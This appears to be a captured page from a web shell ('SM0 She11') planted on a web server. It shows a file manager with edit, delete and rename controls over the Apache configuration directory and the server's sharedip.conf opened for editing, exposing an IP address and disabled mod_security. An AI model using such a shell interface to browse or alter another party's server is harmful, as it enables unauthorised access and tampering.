SM0 She11
Path:
/
/
usr
/
local
/
apache
/
conf
Full Path (server): /usr/local/apache/conf
Create Fil3
Upl04d Fil3
📁 extra
Open
[D]
[R]
📄 httpd.conf
[E]
[D]
[R]
📄 httpd.conf.rpmnew
[E]
[D]
[R]
📄 httpd.conf_backup
[E]
[D]
[R]
📄 magic
[E]
[D]
[R]
📄 mime.types
[E]
[D]
[R]
📁 original
Open
[D]
[R]
📄 sharedip.conf
[E]
[D]
[R]
Editing: sharedip.conf
<VirtualHost 159.69.37.177:80> ServerName 159.69.37.177 DocumentRoot /usr/local/apache/htdocs ServerAdmin info@centos-webpanel.com <IfModule mod_suphp.c> suPHP_UserGroup nobody nobody </IfModule> <Proxy "*"> <IfModule mod_security2.c> SecRuleEngine Off </IfModule> </Proxy> RewriteEngine On RewriteCond %{HTTP_HOST} !^159.69.37.177$ RewriteCond %{HTTP_HOST} ^webmail. RewriteRule ^/(.*) http://127.0.0.1:2095/$1 [P] </VirtualHost> <Directory "/"> AllowOverride All Require all granted </Directory>
Save